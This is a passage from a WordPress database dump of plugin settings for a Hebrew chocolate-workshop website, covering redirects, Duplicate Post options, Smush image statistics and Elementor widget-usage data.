;s:9:\"profileID\";s:9:\"175903710\";s:10:\"useSnippet\";b:0;s:16:\"ampClientIDOptIn\";b:1;}','yes'),(25338,'ihaf_insert_header','<meta name=\\\"ahrefs-site-verification\\\" content=\\\"8c616b208c2539a9ff7e0502752ca942f6f383a681b620e12ad6a21561d6f549\\\">','yes'),(25339,'ihaf_insert_footer','','yes'),(25340,'insert-headers-and-footers_welcome_dismissed_key','1','yes'),(25471,'category_children','a:0:{}','yes'),(25551,'301_redirects','a:6:{s:34:\"/סדנת-שוקולד-זוגית/\";s:81:\"https://www.chocolate4u.co.il/chocolate-workshops/chocolate-workshop-for-couples/\";s:49:\"/סדנת-שוקולד-למסיבת-רווקות/\";s:92:\"https://www.chocolate4u.co.il/chocolate-workshops/chocolate-workshop-for-bachelorette-party/\";s:42:\"/סדנאות-שוקולד-לקבוצות/\";s:83:\"https://www.chocolate4u.co.il/chocolate-workshops/chocolate-workshop-for-employees/\";s:36:\"/סדנת-שוקולד-לילדים/\";s:78:\"https://www.chocolate4u.co.il/chocolate-workshops/chocolate-workshop-for-kids/\";s:15:\"/צרו-קשר/\";s:41:\"https://www.chocolate4u.co.il/contact-us/\";s:14:\"/המגזין/\";s:39:\"https://www.chocolate4u.co.il/articles/\";}','yes'),(28398,'duplicate_post_copytitle','1','yes'),(28399,'duplicate_post_copydate','0','yes'),(28400,'duplicate_post_copystatus','0','yes'),(28401,'duplicate_post_copyslug','0','yes'),(28402,'duplicate_post_copyexcerpt','1','yes'),(28403,'duplicate_post_copycontent','1','yes'),(28404,'duplicate_post_copythumbnail','1','yes'),(28405,'duplicate_post_copytemplate','1','yes'),(28406,'duplicate_post_copyformat','1','yes'),(28407,'duplicate_post_copyauthor','0','yes'),(28408,'duplicate_post_copypassword','0','yes'),(28409,'duplicate_post_copyattachments','0','yes'),(28410,'duplicate_post_copychildren','0','yes'),(28411,'duplicate_post_copycomments','0','yes'),(28412,'duplicate_post_copymenuorder','1','yes'),(28413,'duplicate_post_taxonomies_blacklist','a:0:{}','yes'),(28414,'duplicate_post_blacklist','','yes'),(28415,'duplicate_post_types_enabled','a:2:{i:0;s:4:\"post\";i:1;s:4:\"page\";}','yes'),(28416,'duplicate_post_show_row','1','yes'),(28417,'duplicate_post_show_adminbar','1','yes'),(28418,'duplicate_post_show_submitbox','1','yes'),(28419,'duplicate_post_show_bulkactions','1','yes'),(28420,'duplicate_post_show_original_column','0','yes'),(28421,'duplicate_post_show_original_in_post_states','0','yes'),(28422,'duplicate_post_show_original_meta_box','0','yes'),(28423,'duplicate_post_version','3.2.4','yes'),(28424,'duplicate_post_show_notice','0','no'),(29121,'wp-smush-settings','a:20:{s:4:\"auto\";b:1;s:5:\"lossy\";b:0;s:10:\"strip_exif\";b:1;s:6:\"resize\";b:0;s:9:\"detection\";b:0;s:8:\"original\";b:0;s:6:\"backup\";b:0;s:10:\"png_to_jpg\";b:0;s:7:\"nextgen\";b:0;s:2:\"s3\";b:0;s:9:\"gutenberg\";b:0;s:10:\"js_builder\";b:0;s:3:\"cdn\";b:0;s:11:\"auto_resize\";b:0;s:4:\"webp\";b:1;s:5:\"usage\";b:0;s:17:\"accessible_colors\";b:0;s:9:\"keep_data\";b:1;s:9:\"lazy_load\";b:0;s:17:\"background_images\";b:1;}','yes'),(29122,'wp-smush-install-type','existing','no'),(29123,'wp-smush-version','3.4.2','no'),(29124,'wdev-frash','a:3:{s:7:\"plugins\";a:1:{s:23:\"wp-smushit/wp-smush.php\";i:1580305287;}s:5:\"queue\";a:1:{s:32:\"fc50097023d0d34c5a66f6cddcf77694\";a:4:{s:6:\"plugin\";s:23:\"wp-smushit/wp-smush.php\";s:4:\"type\";s:4:\"rate\";s:7:\"show_at\";i:1580910087;s:6:\"sticky\";b:1;}}s:4:\"done\";a:1:{i:0;a:6:{s:6:\"plugin\";s:23:\"wp-smushit/wp-smush.php\";s:4:\"type\";s:5:\"email\";s:7:\"show_at\";i:1580305287;s:5:\"state\";s:6:\"ignore\";s:4:\"hash\";s:32:\"fc50097023d0d34c5a66f6cddcf77694\";s:10:\"handled_at\";i:1580314354;}}}','no'),(29127,'smush_global_stats','a:9:{s:11:\"size_before\";i:4699295;s:10:\"size_after\";i:4222098;s:7:\"percent\";d:10.199999999999999;s:5:\"human\";s:8:\"466.0 KB\";s:5:\"bytes\";i:477197;s:12:\"total_images\";i:187;s:12:\"resize_count\";i:0;s:14:\"resize_savings\";i:0;s:18:\"conversion_savings\";i:0;}','no'),(29128,'dir_smush_stats','a:2:{s:9:\"dir_smush\";a:2:{s:5:\"total\";i:0;s:9:\"optimised\";i:0;}s:14:\"combined_stats\";a:0:{}}','no'),(29129,'skip-smush-setup','1','yes'),(34271,'elementor_controls_usage','a:8:{s:7:\"wp-post\";a:17:{s:11:\"text-editor\";a:2:{s:5:\"count\";i:55;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:55;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:10:{s:10:\"text_color\";i:2;s:21:\"typography_typography\";i:2;s:20:\"typography_font_size\";i:2;s:12:\"align_mobile\";i:2;s:22:\"typography_font_weight\";i:1;s:12:\"align_tablet\";i:1;s:22:\"typography_font_family\";i:1;s:22:\"typography_line_height\";i:1;s:27:\"typography_font_size_tablet\";i:1;s:27:\"typography_font_size_mobile\";i:1;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:1:{s:7:\"_margin\";i:1;}}}}s:6:\"column\";a:2:{s:5:\"count\";i:142;s:8:\"controls\";a:3:{s:6:\"layout\";a:1:{s:6:\"layout\";a:4:{s:12:\"_inline_size\";i:28;s:19:\"_inline_size_tablet\";i:3;s:19:\"_inline_size_mobile\";i:2;s:16:\"content_position\";i:1;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:7:{s:13:\"margin_tablet\";i:8;s:13:\"margin_mobile\";i:7;s:14:\"padding_tablet\";i:3;s:14:\"padding_mobile\";i:7;s:6:\"margin\";i:7;s:9:\"screen_sm\";i:4;s:15:\"screen_sm_width\";i:4;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:2:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;}}}}s:7:\"section\";a:2:{s:5:\"count\";i:128;s:8:\"controls\";a:3:{s:6:\"layout\";a:2:{s:14:\"section_layout\";a:7:{s:15:\"stretch_section\";i:8;s:13:\"content_width\";i:1;s:16:\"content_position\";i:1;s:3:\"gap\";i:3;s:6:\"height\";i:1;s:13:\"custom_height\";i:1;s:15:\"column_position\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:11;}}s:5:\"style\";a:3:{s:18:\"section_background\";a:7:{s:21:\"background_background\";i:50;s:16:\"background_color\";i:45;s:18:\"background_color_b\";i:27;s:25:\"background_gradient_angle\";i:1;s:16:\"background_image\";i:2;s:19:\"background_position\";i:1;s:15:\"background_size\";i:2;}s:14:\"section_border\";a:3:{s:13:\"border_border\";i:1;s:12:\"border_width\";i:1;s:12:\"border_color\";i:1;}s:26:\"section_background_overlay\";a:3:{s:29:\"background_overlay_background\";i:1;s:24:\"background_overlay_color\";i:1;s:26:\"background_overlay_opacity\";i:1;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:4:{s:7:\"padding\";i:29;s:14:\"padding_tablet\";i:5;s:14:\"padding_mobile\";i:5;s:6:\"margin\";i:1;}}}}s:11:\"breadcrumbs\";a:2:{s:5:\"count\";i:8;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:27:\"section_breadcrumbs_content\";a:1:{s:5:\"align\";i:8;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:6:{s:21:\"typography_typography\";i:8;s:22:\"typography_font_family\";i:8;s:20:\"typography_font_size\";i:8;s:22:\"typography_font_weight\";i:8;s:26:\"typography_text_decoration\";i:8;s:10:\"text_color\";i:8;}}}}s:6:\"slides\";a:2:{s:5:\"count\";i:8;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_slides\";a:2:{s:6:\"slides\";i:8;s:13:\"slides_height\";i:8;}}}}s:7:\"heading\";a:2:{s:5:\"count\";i:59;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:13:\"section_title\";a:5:{s:5:\"title\";i:59;s:5:\"align\";i:33;s:11:\"header_size\";i:18;s:12:\"align_mobile\";i:2;s:12:\"align_tablet\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:10:{s:11:\"title_color\";i:35;s:21:\"typography_typography\";i:33;s:20:\"typography_font_size\";i:33;s:22:\"typography_font_weight\";i:8;s:25:\"typography_text_transform\";i:4;s:22:\"typography_line_height\";i:2;s:27:\"typography_font_size_tablet\";i:5;s:27:\"typography_font_size_mobile\";i:5;s:22:\"typography_font_family\";i:5;s:21:\"typography_font_style\";i:1;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:3:{s:8:\"_padding\";i:2;s:15:\"_padding_tablet\";i:2;s:15:\"_padding_mobile\";i:2;}}}}s:4:\"form\";a:2:{s:5:\"count\";i:29;s:8:\"controls\";a:3:{s:7:\"content\";a:8:{s:19:\"section_form_fields\";a:4:{s:11:\"form_fields\";i:29;s:10:\"input_size\";i:29;s:11:\"show_labels\";i:29;s:9:\"form_name\";i:3;}s:21:\"section_submit_button\";a:5:{s:11:\"button_size\";i:29;s:12:\"button_width\";i:27;s:20:\"selected_button_icon\";i:28;s:11:\"button_text\";i:3;s:18:\"button_icon_indent\";i:2;}s:19:\"section_integration\";a:1:{s:14:\"submit_actions\";i:28;}s:16:\"section_redirect\";a:1:{s:11:\"redirect_to\";i:28;}s:15:\"section_webhook\";a:2:{s:8:\"webhooks\";i:28;s:22:\"webhooks_advanced_data\";i:1;}s:20:\"section_form_options\";a:4:{s:15:\"success_message\";i:3;s:13:\"error_message\";i:3;s:22:\"required_field_message\";i:3;s:15:\"invalid_message\";i:3;}s:13:\"section_email\";a:4:{s:13:\"email_subject\";i:3;s:10:\"email_from\";i:3;s:8:\"email_to\";i:9;s:15:\"email_from_name\";i:1;}s:15:\"section_email_2\";a:3:{s:15:\"email_subject_2\";i:3;s:12:\"email_from_2\";i:3;s:17:\"email_from_name_2\";i:3;}}s:5:\"style\";a:3:{s:20:\"section_button_style\";a:12:{s:17:\"button_text_color\";i:27;s:23:\"button_background_color\";i:3;s:28:\"button_typography_typography\";i:2;s:29:\"button_typography_font_weight\";i:2;s:20:\"button_border_radius\";i:2;s:29:\"button_background_hover_color\";i:2;s:27:\"button_typography_font_size\";i:1;s:32:\"button_typography_text_transform\";i:1;s:18:\"button_hover_color\";i:1;s:32:\"button_typography_letter_spacing\";i:1;s:19:\"button_text_padding\";i:1;s:34:\"button_typography_font_size_tablet\";i:1;}s:18:\"section_form_style\";a:6:{s:10:\"column_gap\";i:2;s:7:\"row_gap\";i:2;s:27:\"label_typography_typography\";i:2;s:11:\"label_color\";i:1;s:26:\"label_typography_font_size\";i:1;s:28:\"label_typography_font_family\";i:1;}s:19:\"section_field_style\";a:7:{s:16:\"field_text_color\";i:2;s:27:\"field_typography_typography\";i:2;s:18:\"field_border_width\";i:2;s:19:\"field_border_radius\";i:2;s:26:\"field_typography_font_size\";i:1;s:28:\"field_typography_font_weight\";i:1;s:33:\"field_typography_font_size_tablet\";i:1;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:3:{s:8:\"_padding\";i:1;s:15:\"_padding_tablet\";i:1;s:15:\"_padding_mobile\";i:1;}}}}s:9:\"icon-list\";a:2:{s:5:\"count\";i:10;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:10;}}s:5:\"style\";a:3:{s:17:\"section_icon_list\";a:2:{s:10:\"icon_align\";i:8;s:13:\"space_between\";i:2;}s:18:\"section_icon_style\";a:1:{s:9:\"icon_size\";i:10;}s:18:\"section_text_style\";a:7:{s:11:\"text_indent\";i:10;s:26:\"icon_typography_typography\";i:10;s:25:\"icon_typography_font_size\";i:10;s:27:\"icon_typography_line_height\";i:8;s:10:\"text_color\";i:2;s:27:\"icon_typography_font_weight\";i:2;s:32:\"icon_typography_font_size_tablet\";i:2;}}}}s:5:\"image\";a:2:{s:5:\"count\";i:11;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:5:\"image\";i:11;s:10:\"image_size\";i:1;s:7:\"caption\";i:1;s:14:\"caption_source\";i:1;}}s:5:\"style\";a:2:{s:19:\"section_style_image\";a:1:{s:5:\"space\";i:1;}s:21:\"section_style_caption\";a:3:{s:10:\"text_color\";i:1;s:29:\"caption_typography_typography\";i:1;s:28:\"caption_typography_font_size\";i:1;}}s:8:\"advanced\";a:2:{s:14:\"_section_style\";a:2:{s:8:\"_padding\";i:2;s:15:\"_padding_mobile\";i:1;}s:19:\"_section_background\";a:2:{s:22:\"_background_background\";i:1;s:17:\"_background_color\";i:1;}}}}s:5:\"posts\";a:2:{s:5:\"count\";i:10;s:8:\"controls\";a:1:{s:7:\"content\";a:3:{s:14:\"section_layout\";a:10:{s:22:\"classic_posts_per_page\";i:1;s:18:\"classic_item_ratio\";i:1;s:19:\"classic_image_width\";i:1;s:17:\"classic_meta_data\";i:2;s:5:\"_skin\";i:1;s:22:\"classic_read_more_text\";i:1;s:18:\"cards_show_excerpt\";i:1;s:15:\"cards_meta_data\";i:1;s:20:\"cards_read_more_text\";i:1;s:17:\"cards_show_avatar\";i:1;}s:13:\"section_query\";a:5:{s:15:\"posts_post_type\";i:2;s:13:\"posts_exclude\";i:1;s:17:\"posts_exclude_ids\";i:1;s:22:\"posts_avoid_duplicates\";i:1;s:15:\"posts_posts_ids\";i:7;}s:18:\"section_pagination\";a:2:{s:21:\"pagination_prev_label\";i:1;s:21:\"pagination_next_label\";i:1;}}}}s:15:\"post-navigation\";a:2:{s:5:\"count\";i:12;s:8:\"controls\";a:0:{}}s:6:\"spacer\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:1:{s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:1:{s:7:\"_margin\";i:1;}}}}s:6:\"global\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:0:{}}s:22:\"wp-widget-recent-posts\";a:2:{s:5:\"count\";i:2;s:8:\"controls\";a:0:{}}s:7:\"divider\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:1:{s:6:\"weight\";i:1;}}s:7:\"content\";a:1:{s:15:\"section_divider\";a:2:{s:5:\"width\";i:1;s:5:\"align\";i:1;}}}}s:9:\"image-box\";a:2:{s:5:\"count\";i:4;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:5:\"image\";i:4;s:10:\"title_text\";i:4;s:16:\"description_text\";i:4;s:4:\"link\";i:4;}}s:5:\"style\";a:2:{s:19:\"section_style_image\";a:2:{s:11:\"image_space\";i:4;s:10:\"image_size\";i:4;}s:21:\"section_style_content\";a:6:{s:17:\"description_color\";i:4;s:32:\"description_typography_font_size\";i:4;s:34:\"description_typography_font_family\";i:4;s:34:\"description_typography_line_height\";i:4;s:39:\"description_typography_font_size_tablet\";i:4;s:39:\"description_typography_font_size_mobile\";i:4;}}}}s:6:\"button\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:14:\"section_button\";a:3:{s:4:\"text\";i:1;s:5:\"align\";i:1;s:4:\"link\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:15:{s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:25:\"typography_text_transform\";i:1;s:25:\"typography_letter_spacing\";i:1;s:17:\"button_text_color\";i:1;s:16:\"background_color\";i:1;s:12:\"border_width\";i:1;s:12:\"border_color\";i:1;s:13:\"border_radius\";i:1;s:12:\"text_padding\";i:1;s:27:\"typography_font_size_tablet\";i:1;s:11:\"hover_color\";i:1;s:29:\"button_background_hover_color\";i:1;s:22:\"typography_font_family\";i:1;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:1:{s:8:\"_padding\";i:1;}}}}}s:7:\"section\";a:12:{s:6:\"spacer\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:1:{s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:1:{s:7:\"_margin\";i:1;}}}}s:7:\"heading\";a:2:{s:5:\"count\";i:17;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:5:{s:5:\"title\";i:17;s:5:\"align\";i:3;s:11:\"header_size\";i:12;s:12:\"align_tablet\";i:4;s:12:\"align_mobile\";i:4;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:15;s:21:\"typography_typography\";i:14;s:20:\"typography_font_size\";i:14;s:22:\"typography_font_weight\";i:12;s:25:\"typography_text_transform\";i:12;}}}}s:6:\"global\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:0:{}}s:6:\"column\";a:2:{s:5:\"count\";i:27;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:20;s:19:\"_inline_size_tablet\";i:14;s:19:\"_inline_size_mobile\";i:12;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:4:{s:13:\"margin_tablet\";i:4;s:13:\"margin_mobile\";i:4;s:14:\"padding_tablet\";i:4;s:14:\"padding_mobile\";i:7;}}}}s:7:\"section\";a:2:{s:5:\"count\";i:18;s:8:\"controls\";a:3:{s:5:\"style\";a:2:{s:18:\"section_background\";a:4:{s:21:\"background_background\";i:13;s:16:\"background_color\";i:13;s:18:\"background_color_b\";i:8;s:25:\"background_gradient_angle\";i:3;}s:14:\"section_border\";a:3:{s:13:\"border_border\";i:5;s:12:\"border_width\";i:5;s:12:\"border_color\";i:5;}}s:8:\"advanced\";a:2:{s:16:\"section_advanced\";a:4:{s:7:\"padding\";i:7;s:6:\"margin\";i:5;s:14:\"padding_tablet\";i:7;s:14:\"padding_mobile\";i:7;}s:15:\"section_effects\";a:1:{s:6:\"sticky\";i:2;}}s:6:\"layout\";a:2:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:5;}s:14:\"section_layout\";a:7:{s:16:\"content_position\";i:5;s:15:\"stretch_section\";i:4;s:3:\"gap\";i:2;s:13:\"custom_height\";i:2;s:6:\"height\";i:2;s:20:\"custom_height_mobile\";i:2;s:20:\"custom_height_tablet\";i:2;}}}}s:4:\"form\";a:2:{s:5:\"count\";i:7;s:8:\"controls\";a:2:{s:7:\"content\";a:8:{s:19:\"section_form_fields\";a:4:{s:11:\"form_fields\";i:7;s:10:\"input_size\";i:7;s:11:\"show_labels\";i:7;s:9:\"form_name\";i:4;}s:21:\"section_submit_button\";a:4:{s:11:\"button_size\";i:7;s:12:\"button_width\";i:7;s:20:\"selected_button_icon\";i:3;s:11:\"button_text\";i:4;}s:19:\"section_integration\";a:1:{s:14:\"submit_actions\";i:2;}s:16:\"section_redirect\";a:1:{s:11:\"redirect_to\";i:2;}s:15:\"section_webhook\";a:1:{s:8:\"webhooks\";i:2;}s:20:\"section_form_options\";a:4:{s:15:\"success_message\";i:4;s:13:\"error_message\";i:4;s:22:\"required_field_message\";i:4;s:15:\"invalid_message\";i:4;}s:13:\"section_email\";a:3:{s:13:\"email_subject\";i:4;s:10:\"email_from\";i:4;s:15:\"email_from_name\";i:4;}s:15:\"section_email_2\";a:3:{s:15:\"email_subject_2\";i:4;s:12:\"email_from_2\";i:4;s:17:\"email_from_name_2\";i:4;}}s:5:\"style\";a:3:{s:20:\"section_button_style\";a:9:{s:17:\"button_text_color\";i:7;s:23:\"button_background_color\";i:4;s:28:\"button_typography_typography\";i:4;s:27:\"button_typography_font_size\";i:4;s:29:\"button_typography_font_weight\";i:4;s:32:\"button_typography_text_transform\";i:4;s:20:\"button_border_radius\";i:4;s:29:\"button_background_hover_color\";i:4;s:18:\"button_hover_color\";i:4;}s:18:\"section_form_style\";a:5:{s:10:\"column_gap\";i:4;s:7:\"row_gap\";i:4;s:11:\"label_color\";i:4;s:27:\"label_typography_typography\";i:4;s:26:\"label_typography_font_size\";i:4;}s:19:\"section_field_style\";a:6:{s:16:\"field_text_color\";i:4;s:27:\"field_typography_typography\";i:4;s:26:\"field_typography_font_size\";i:4;s:28:\"field_typography_font_weight\";i:4;s:18:\"field_border_width\";i:4;s:19:\"field_border_radius\";i:4;}}}}s:11:\"text-editor\";a:2:{s:5:\"count\";i:6;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:6;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:7:{s:10:\"text_color\";i:5;s:21:\"typography_typography\";i:4;s:20:\"typography_font_size\";i:4;s:22:\"typography_font_weight\";i:4;s:12:\"align_tablet\";i:4;s:12:\"align_mobile\";i:4;s:5:\"align\";i:1;}}}}s:9:\"icon-list\";a:2:{s:5:\"count\";i:9;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:9;}}s:5:\"style\";a:3:{s:17:\"section_icon_list\";a:2:{s:13:\"space_between\";i:8;s:10:\"icon_align\";i:1;}s:18:\"section_icon_style\";a:1:{s:9:\"icon_size\";i:9;}s:18:\"section_text_style\";a:7:{s:10:\"text_color\";i:8;s:11:\"text_indent\";i:9;s:26:\"icon_typography_typography\";i:9;s:25:\"icon_typography_font_size\";i:9;s:27:\"icon_typography_font_weight\";i:8;s:32:\"icon_typography_font_size_tablet\";i:8;s:27:\"icon_typography_line_height\";i:1;}}}}s:8:\"nav-menu\";a:2:{s:5:\"count\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_layout\";a:7:{s:11:\"align_items\";i:2;s:14:\"animation_line\";i:2;s:14:\"animation_text\";i:2;s:7:\"pointer\";i:2;s:8:\"dropdown\";i:2;s:10:\"full_width\";i:2;s:20:\"animation_background\";i:2;}}s:5:\"style\";a:3:{s:23:\"section_style_main-menu\";a:9:{s:15:\"color_menu_item\";i:2;s:21:\"color_menu_item_hover\";i:2;s:29:\"pointer_color_menu_item_hover\";i:2;s:26:\"menu_typography_typography\";i:2;s:25:\"menu_typography_font_size\";i:2;s:13:\"pointer_width\";i:2;s:30:\"menu_typography_text_transform\";i:2;s:22:\"color_menu_item_active\";i:2;s:26:\"padding_vertical_menu_item\";i:2;}s:22:\"section_style_dropdown\";a:6:{s:19:\"color_dropdown_item\";i:2;s:30:\"background_color_dropdown_item\";i:2;s:25:\"color_dropdown_item_hover\";i:2;s:36:\"background_color_dropdown_item_hover\";i:2;s:30:\"dropdown_typography_typography\";i:2;s:29:\"dropdown_typography_font_size\";i:2;}s:12:\"style_toggle\";a:6:{s:12:\"toggle_color\";i:2;s:18:\"toggle_color_hover\";i:2;s:11:\"toggle_size\";i:2;s:19:\"toggle_border_width\";i:2;s:20:\"toggle_border_radius\";i:2;s:23:\"toggle_background_color\";i:2;}}}}s:15:\"theme-site-logo\";a:2:{s:5:\"count\";i:2;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:4;}}s:5:\"style\";a:1:{s:19:\"section_style_image\";a:2:{s:5:\"width\";i:2;s:12:\"width_mobile\";i:2;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:12:\"align_mobile\";i:2;s:5:\"image\";i:2;s:5:\"align\";i:2;s:4:\"link\";i:2;}}}}s:5:\"image\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:1:{s:5:\"image\";i:1;}}}}s:11:\"breadcrumbs\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:27:\"section_breadcrumbs_content\";a:1:{s:5:\"align\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:6:{s:21:\"typography_typography\";i:1;s:22:\"typography_font_family\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:26:\"typography_text_decoration\";i:1;s:10:\"text_color\";i:1;}}}}}s:6:\"widget\";a:1:{s:5:\"posts\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:2:{s:14:\"section_layout\";a:2:{s:22:\"classic_posts_per_page\";i:1;s:17:\"classic_meta_data\";i:1;}s:13:\"section_query\";a:3:{s:15:\"posts_post_type\";i:1;s:13:\"posts_exclude\";i:1;s:17:\"posts_exclude_ids\";i:1;}}}}}s:7:\"wp-page\";a:7:{s:7:\"heading\";a:2:{s:5:\"count\";i:11;s:8:\"controls\";a:3:{s:7:\"content\";a:1:{s:13:\"section_title\";a:3:{s:5:\"title\";i:11;s:11:\"header_size\";i:2;s:5:\"align\";i:11;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:3:{s:21:\"typography_typography\";i:11;s:20:\"typography_font_size\";i:11;s:11:\"title_color\";i:8;}}s:8:\"advanced\";a:1:{s:14:\"_section_style\";a:1:{s:8:\"_padding\";i:2;}}}}s:6:\"column\";a:2:{s:5:\"count\";i:45;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:12;}}}}s:7:\"section\";a:2:{s:5:\"count\";i:37;s:8:\"controls\";a:3:{s:5:\"style\";a:1:{s:18:\"section_background\";a:3:{s:21:\"background_background\";i:8;s:16:\"background_color\";i:8;s:18:\"background_color_b\";i:8;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:7:\"padding\";i:8;}}s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:4;}}}}s:6:\"slides\";a:2:{s:5:\"count\";i:7;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_slides\";a:2:{s:6:\"slides\";i:7;s:13:\"slides_height\";i:7;}}}}s:11:\"text-editor\";a:2:{s:5:\"count\";i:17;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:17;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:2:{s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:4:\"form\";a:2:{s:5:\"count\";i:8;s:8:\"controls\";a:2:{s:7:\"content\";a:6:{s:19:\"section_form_fields\";a:3:{s:11:\"form_fields\";i:8;s:10:\"input_size\";i:8;s:11:\"show_labels\";i:8;}s:21:\"section_submit_button\";a:3:{s:11:\"button_size\";i:8;s:12:\"button_width\";i:8;s:20:\"selected_button_icon\";i:8;}s:19:\"section_integration\";a:1:{s:14:\"submit_actions\";i:8;}s:16:\"section_redirect\";a:1:{s:11:\"redirect_to\";i:8;}s:15:\"section_webhook\";a:1:{s:8:\"webhooks\";i:8;}s:13:\"section_email\";a:1:{s:8:\"email_to\";i:8;}}s:5:\"style\";a:2:{s:20:\"section_button_style\";a:1:{s:17:\"button_text_color\";i:8;}s:22:\"section_messages_style\";a:1:{s:21:\"success_message_color\";i:1;}}}}s:9:\"image-box\";a:2:{s:5:\"count\";i:10;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:5:\"image\";i:10;s:10:\"title_text\";i:10;s:16:\"description_text\";i:10;s:4:\"link\";i:10;}}s:5:\"style\";a:2:{s:19:\"section_style_image\";a:2:{s:11:\"image_space\";i:10;s:10:\"image_size\";i:10;}s:21:\"section_style_content\";a:1:{s:18:\"title_bottom_space\";i:10;}}}}}s:4:\"page\";a:11:{s:6:\"slides\";a:2:{s:5:\"count\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_slides\";a:2:{s:6:\"slides\";i:1;s:13:\"slides_height\";i:1;}}}}s:6:\"column\";a:2:{s:5:\"count\";i:35;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:27;s:19:\"_inline_size_mobile\";i:14;s:19:\"_inline_size_tablet\";i:15;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:4:{s:13:\"margin_tablet\";i:4;s:13:\"margin_mobile\";i:4;s:14:\"padding_tablet\";i:4;s:14:\"padding_mobile\";i:8;}}}}s:7:\"section\";a:2:{s:5:\"count\";i:23;s:8:\"controls\";a:3:{s:5:\"style\";a:2:{s:18:\"section_background\";a:4:{s:21:\"background_background\";i:13;s:16:\"background_color\";i:13;s:18:\"background_color_b\";i:8;s:25:\"background_gradient_angle\";i:4;}s:14:\"section_border\";a:3:{s:13:\"border_border\";i:7;s:12:\"border_width\";i:7;s:12:\"border_color\";i:7;}}s:6:\"layout\";a:2:{s:14:\"section_layout\";a:7:{s:13:\"custom_height\";i:3;s:16:\"content_position\";i:7;s:6:\"height\";i:3;s:20:\"custom_height_mobile\";i:3;s:20:\"custom_height_tablet\";i:3;s:3:\"gap\";i:3;s:15:\"stretch_section\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:8;}}s:8:\"advanced\";a:2:{s:16:\"section_advanced\";a:4:{s:6:\"margin\";i:7;s:14:\"padding_tablet\";i:10;s:14:\"padding_mobile\";i:10;s:7:\"padding\";i:7;}s:15:\"section_effects\";a:1:{s:6:\"sticky\";i:3;}}}}s:11:\"text-editor\";a:2:{s:5:\"count\";i:9;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:8;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:6:{s:10:\"text_color\";i:4;s:21:\"typography_typography\";i:4;s:20:\"